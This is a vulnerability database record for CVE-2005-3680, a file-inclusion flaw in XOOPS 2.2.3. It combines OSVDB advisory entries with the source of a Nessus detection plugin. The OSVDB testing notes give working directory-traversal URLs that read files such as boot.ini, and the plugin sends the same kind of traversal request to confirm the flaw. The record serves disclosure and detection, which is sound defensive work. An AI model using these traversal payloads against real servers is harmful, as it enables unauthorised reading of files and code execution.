ID CVE-2005-3680 Type cve Reporter NVD Modified 2016-10-17T23:36:48
Description
Directory traversal vulnerability in editor_registry.php in XOOPS 2.2.3 allows remote attackers to read or include arbitrary local files via a .. (dot dot) in the xoopsConfig[language] parameter.
{"osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script\nhttp://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00\n## References:\nVendor URL: http://www.xoops.org/\n[Secunia Advisory ID:17573](https://secuniaresearch.flexerasoftware.com/advisories/17573/)\n[Related OSVDB ID: 20854](https://vulners.com/osvdb/OSVDB:20854)\n[Related OSVDB ID: 20855](https://vulners.com/osvdb/OSVDB:20855)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0152.html\nFrSIRT Advisory: ADV-2005-2428\n[CVE-2005-3680](https://vulners.com/cve/CVE-2005-3680)\nBugtraq ID: 15406\n", "modified": "2005-11-12T09:18:28", "published": "2005-11-12T09:18:28", "href": "https://vulners.com/osvdb/OSVDB:20853", "id": "OSVDB:20853", "type": "osvdb", "title": "XOOPS textarea/editor_registry.php xoopsConfig[language] Variable Traversal Arbitrary File Access", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script\nhttp://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00\n## References:\nVendor URL: http://www.xoops.org/\n[Secunia Advisory ID:17573](https://secuniaresearch.flexerasoftware.com/advisories/17573/)\n[Related OSVDB ID: 20853](https://vulners.com/osvdb/OSVDB:20853)\n[Related OSVDB ID: 20855](https://vulners.com/osvdb/OSVDB:20855)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0152.html\nFrSIRT Advisory: ADV-2005-2428\n[CVE-2005-3680](https://vulners.com/cve/CVE-2005-3680)\nBugtraq ID: 15406\n", "modified": "2005-11-12T09:18:28", "published": "2005-11-12T09:18:28", "href": "https://vulners.com/osvdb/OSVDB:20854", "id": "OSVDB:20854", "type": "osvdb", "title": "XOOPS koivi/editor_registry.php xoopsConfig[language] Variable Traversal Arbitrary File Access", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script\nhttp://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00\n## References:\nVendor URL: http://www.xoops.org/\n[Secunia Advisory ID:17573](https://secuniaresearch.flexerasoftware.com/advisories/17573/)\n[Related OSVDB ID: 20853](https://vulners.com/osvdb/OSVDB:20853)\n[Related OSVDB ID: 20854](https://vulners.com/osvdb/OSVDB:20854)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0152.html\nFrSIRT Advisory: ADV-2005-2428\n[CVE-2005-3680](https://vulners.com/cve/CVE-2005-3680)\nBugtraq ID: 15406\n", "modified": "2005-11-12T09:18:28", "published": "2005-11-12T09:18:28", "href": "https://vulners.com/osvdb/OSVDB:20855", "id": "OSVDB:20855", "type": "osvdb", "title": "XOOPS dhtmltextarea/editor_registry.php xoopsConfig[language] Variable Traversal Arbitrary File Access", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:51", "bulletinFamily": "scanner", "description": "The remote installation of XOOPS fails to sanitize user-supplied input to the 'xoopsConfig[language]' parameter of several xoopseditor scripts before using it in PHP 'include' functions. An unauthenticated attacker may be able to leverage these issues to read arbitrary local files and even execute arbitrary PHP code, subject to the privileges of the web server user id. Successful exploitation requires that PHP's 'register_globals' setting be enabled and possibly that 'magic_quotes_gpc' be disabled.", "modified": "2018-08-07T00:00:00", "id": "XOOPS_XOOPSCONFIG_FILE_INCLUDES.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20213", "published": "2005-11-16T00:00:00", "title": "XOOPS xoopsConfig[language] Parameter Local File Inclusion (XOOPS_WFd205_xpl)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20213);\n script_version(\"1.18\");\n\n script_cve_id(\"CVE-2005-3680\");\n script_bugtraq_id(15406);\n\n script_name(english:\"XOOPS xoopsConfig[language] Parameter Local File Inclusion (XOOPS_WFd205_xpl)\");\n script_summary(english:\"Checks for xoopsConfig parameter local file inclusion vulnerabilities in XOOPS\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple local file inclusion issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote installation of XOOPS fails to sanitize user-supplied input\nto the 'xoopsConfig[language]' parameter of several xoopseditor\nscripts before using it in PHP 'include' functions. An\nunauthenticated attacker may be able to leverage these issues to read\narbitrary local files and even execute arbitrary PHP code, subject to\nthe privileges of the web server user id. Successful exploitation\nrequires that PHP's 'register_globals' setting be enabled and possibly\nthat 'magic_quotes_gpc' be disabled.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://retrogod.altervista.org/xoops_xpl.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting and enable its\n'magic_quotes_gpc' setting.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/11/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/11/12\");\n script_cvs_date(\"Date: 2018/08/07 16:46:49\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:xoops:xoops\");\nscript_end_attributes();\n\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"xoops_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/xoops\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/xoops\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n #\n # nb: header.php in XOOP's main directory is useful because it should\n # always be present, returns a message if called directly, and its\n # use doesn't depend on magic_quotes_gpc.\n file = \"../../../../header\";\n if (thorough_tests) editors = make_list(\"dhtmltextarea\", \"koivi\", \"textarea\");\n else editors = make_list(\"textarea\");\n\n foreach editor (editors) {\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(\n dir, \"/class/xoopseditor/\", editor, \"/editor_registry.php?\",\n \"xoopsConfig[language]=\", file\n ));\n if (isnull(r)) exit(0);\n\n # There's a problem if we get a message about \"root path\".\n if (\"XOOPS root path not defined\" >< r[2]) {\n security_warning(port);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
